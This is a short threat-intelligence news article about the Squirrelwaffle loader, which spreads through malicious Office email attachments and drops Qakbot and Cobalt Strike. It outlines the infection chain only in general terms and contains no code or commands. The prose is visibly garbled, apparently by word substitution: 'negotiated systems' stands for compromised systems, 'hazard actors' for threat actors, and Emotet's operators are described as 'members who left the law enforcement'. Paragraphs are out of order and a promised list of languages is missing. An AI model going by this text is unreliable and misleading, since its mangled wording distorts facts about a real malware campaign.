Threat Actors Using Squirrelwaffle Loader to Deploy Qakbot & Cobalt Strike Malware

Soon after the disturbance of the widely used botnet, Emotet by the law enforcement firms, Squirrelwaffle emerged as an alternative to Emotet. The very first signs of this new danger appeared in September 2021, and the circulation volumes reached a peak at the end of that month.

A new threat emerged just recently in the wild that drops malware like Qakbot and Cobalt Strike onto negotiated systems and networks; this brand-new risk is called as “Squirrelwaffle” and threat actors are actively spreading out Squirrelwaffle through numerous destructive e-mail projects.

Email Campaigns & & Languages Used

Attack procedure.

According to the report “A malicious.doc or.xls accessory is generally connected to an e-mail that links to malicious ZIP archives hosted on attacker-controlled web servers and runs malware retrieval code on opening.”.

As part of the attack, string reversal is used to obfuscate the code, which then writes a VBS script to the %PROGRAMDATA% directory, and then performs it.


You can follow us on Linkedin, Twitter, Facebook for day-to-day Cybersecurity updates.

The professionals of Cisco Talos have actually prompted all the security experts and organizations to stay mindful of the new TTPs used by the hazard actors.

When done, after that from one of the 5 hardcoded URLs, it brings Squirrelwaffle in DLL kind to deliver it onto the endangered system. Now, here, at this moment, if the Squirrelwaffle in DLL form is successfully provided onto the victims system, then using rundll32.exe the destructive DLL is performed.

After finishing all the phases, the Squirrelwaffle loader deploys malware like Qakbot and Cobalt Strike. For post-exploitation tasks after deploying beacons, the hazard actors use the split versions of Cobalt Strike to get to jeopardized devices from another location.

It is possible that Squirrelwaffle is a revamped variation of Emotet by the members who left the law enforcement; or it may be a brand-new attempt by other risk actors who are attempting the fill the space left behind by Emotet.

In addition to taken reply-chain email campaigns in English, however, the spammers also use e-mails in the following languages:-.

With a C2 over HTTP POST demands consisting of obfuscated data, the malware tries to communicate, and the body of the HTTP POST request includes the following info about the victim system:-.

In order to trick receivers into allowing the macros within MS Office Suite, risk stars utilize DocuSign as bait.

% APPDATA% configuration.
The hostname of the system.
The username of the victim.
The Workstation setup of the system.